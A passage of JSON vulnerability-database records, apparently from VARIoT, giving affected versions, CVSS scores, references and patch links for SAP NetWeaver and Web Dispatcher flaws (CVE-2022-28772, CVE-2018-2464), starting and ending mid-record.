"db": "NVD",
"id": "CVE-2016-9562"
},
{
"db": "CNNVD",
"id": "CNNVD-201611-534"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-11-23T00:00:00",
"db": "VULMON",
"id": "CVE-2016-9562"
},
{
"date": "2016-08-08T00:00:00",
"db": "BID",
"id": "92418"
},
{
"date": "2017-01-10T00:00:00",
"db": "BID",
"id": "95363"
},
{
"date": "2016-11-28T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-005936"
},
{
"date": "2016-11-23T02:59:05.150000",
"db": "NVD",
"id": "CVE-2016-9562"
},
{
"date": "2016-08-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201611-534"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-04-20T00:00:00",
"db": "VULMON",
"id": "CVE-2016-9562"
},
{
"date": "2016-11-24T00:16:00",
"db": "BID",
"id": "92418"
},
{
"date": "2019-04-12T21:00:00",
"db": "BID",
"id": "95363"
},
{
"date": "2016-11-28T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-005936"
},
{
"date": "2021-04-20T19:42:26.687000",
"db": "NVD",
"id": "CVE-2016-9562"
},
{
"date": "2021-04-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201611-534"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "92418"
},
{
"db": "BID",
"id": "95363"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver AS JAVA Service disruption in (DoS) Vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-005936"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Failure to Handle Exceptional Conditions",
"sources": [
{
"db": "BID",
"id": "92418"
},
{
"db": "BID",
"id": "95363"
}
],
"trust": 0.6
}
}
var-202204-1641
Vulnerability from variot
By overlong input values an attacker may force overwrite of the internal program stack in SAP Web Dispatcher - versions 7.53, 7.77, 7.81, 7.85, 7.86, or Internet Communication Manager - versions KRNL64NUC 7.22, 7.22EXT, 7.49, KRNL64UC 7.22, 7.22EXT, 7.49, 7.53, KERNEL 7.22, 7.49, 7.53, 7.77, 7.81, 7.85, 7.86, which makes these programs unavailable, leading to denial of service
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202204-1641",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "krnl64uc_7.22"
},
{
"model": "web dispatcher",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.85"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.81"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.85"
},
{
"model": "web dispatcher",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.53"
},
{
"model": "web dispatcher",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.77"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.49"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.53"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "krnl64nuc_7.22"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.77"
},
{
"model": "web dispatcher",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.86"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.86"
},
{
"model": "web dispatcher",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.81"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "kernel_7.22"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.22ext"
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2022-28772"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.22ext:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.49:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.53:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.77:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.81:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.85:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.86:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:kernel_7.22:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:krnl64nuc_7.22:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:krnl64uc_7.22:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:web_dispatcher:7.53:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:web_dispatcher:7.77:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:web_dispatcher:7.81:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:web_dispatcher:7.85:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:web_dispatcher:7.86:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2022-28772"
}
]
},
"cve": "CVE-2022-28772",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULMON",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CVE-2022-28772",
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "MEDIUM",
"trust": 0.1,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2022-28772",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202204-3155",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2022-28772",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2022-28772"
},
{
"db": "NVD",
"id": "CVE-2022-28772"
},
{
"db": "CNNVD",
"id": "CNNVD-202204-3155"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "By overlong input values an attacker may force overwrite of the internal program stack in SAP Web Dispatcher - versions 7.53, 7.77, 7.81, 7.85, 7.86, or Internet Communication Manager - versions KRNL64NUC 7.22, 7.22EXT, 7.49, KRNL64UC 7.22, 7.22EXT, 7.49, 7.53, KERNEL 7.22, 7.49, 7.53, 7.77, 7.81, 7.85, 7.86, which makes these programs unavailable, leading to denial of service",
"sources": [
{
"db": "NVD",
"id": "CVE-2022-28772"
},
{
"db": "VULMON",
"id": "CVE-2022-28772"
}
],
"trust": 0.99
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2022-28772",
"trust": 1.7
},
{
"db": "CNNVD",
"id": "CNNVD-202204-3155",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2022-28772",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2022-28772"
},
{
"db": "NVD",
"id": "CVE-2022-28772"
},
{
"db": "CNNVD",
"id": "CNNVD-202204-3155"
}
]
},
"id": "VAR-202204-1641",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T12:26:14.959000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP Web Dispatcher Buffer error vulnerability fix",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=190239"
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202204-3155"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-787",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2022-28772"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "https://launchpad.support.sap.com/#/notes/3111311"
},
{
"trust": 1.7,
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/cveshow/cve-2022-28772/"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/sap-multiple-vulnerabilities-de-decembre-2021-38045"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/787.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2022-28772"
},
{
"db": "NVD",
"id": "CVE-2022-28772"
},
{
"db": "CNNVD",
"id": "CNNVD-202204-3155"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2022-28772"
},
{
"db": "NVD",
"id": "CVE-2022-28772"
},
{
"db": "CNNVD",
"id": "CNNVD-202204-3155"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-04-12T00:00:00",
"db": "VULMON",
"id": "CVE-2022-28772"
},
{
"date": "2022-04-12T17:15:10.833000",
"db": "NVD",
"id": "CVE-2022-28772"
},
{
"date": "2022-04-12T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202204-3155"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-04-20T00:00:00",
"db": "VULMON",
"id": "CVE-2022-28772"
},
{
"date": "2022-04-20T14:24:08.470000",
"db": "NVD",
"id": "CVE-2022-28772"
},
{
"date": "2022-04-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202204-3155"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202204-3155"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP Web Dispatcher Buffer error vulnerability",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202204-3155"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202204-3155"
}
],
"trust": 0.6
}
}
var-201809-0969
Vulnerability from variot
SAP WebDynpro Java, versions 7.20, 7.30, 7.31, 7.40, 7.50, does not sufficiently encode user-controlled inputs, resulting in a stored Cross-Site Scripting (XSS) vulnerability. Remote attackers can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201809-0969",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 2.7,
"vendor": "sap",
"version": "7.50"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 2.7,
"vendor": "sap",
"version": "7.40"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 2.7,
"vendor": "sap",
"version": "7.31"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 2.7,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 2.7,
"vendor": "sap",
"version": "7.20"
}
],
"sources": [
{
"db": "BID",
"id": "105308"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010219"
},
{
"db": "NVD",
"id": "CVE-2018-2464"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-493"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.31:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.50:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.30:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.20:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-2464"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported this issue.",
"sources": [
{
"db": "BID",
"id": "105308"
}
],
"trust": 0.3
},
"cve": "CVE-2018-2464",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2018-2464",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.1,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2018-2464",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-2464",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201809-493",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-010219"
},
{
"db": "NVD",
"id": "CVE-2018-2464"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-493"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP WebDynpro Java, versions 7.20, 7.30, 7.31, 7.40, 7.50, does not sufficiently encode user-controlled inputs, resulting in a stored Cross-Site Scripting (XSS) vulnerability. \nRemote attackers can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-2464"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010219"
},
{
"db": "BID",
"id": "105308"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-2464",
"trust": 2.7
},
{
"db": "BID",
"id": "105308",
"trust": 1.9
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010219",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201809-493",
"trust": 0.6
}
],
"sources": [
{
"db": "BID",
"id": "105308"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010219"
},
{
"db": "NVD",
"id": "CVE-2018-2464"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-493"
}
]
},
"id": "VAR-201809-0969",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T13:18:58.736000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP Security Patch Day - September 2018",
"trust": 0.8,
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageid=499356993"
},
{
"title": "SAP WebDynpro Java Fixes for cross-site scripting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=84764"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-010219"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-493"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-010219"
},
{
"db": "NVD",
"id": "CVE-2018-2464"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.9,
"url": "https://launchpad.support.sap.com/#/notes/2679378"
},
{
"trust": 1.9,
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageid=499356993"
},
{
"trust": 1.6,
"url": "http://www.securityfocus.com/bid/105308"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-2464"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-2464"
},
{
"trust": 0.3,
"url": "http://www.sap.com"
}
],
"sources": [
{
"db": "BID",
"id": "105308"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010219"
},
{
"db": "NVD",
"id": "CVE-2018-2464"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-493"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "105308"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010219"
},
{
"db": "NVD",
"id": "CVE-2018-2464"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-493"
}
]
},
"sources_release_date": {
"@context": {
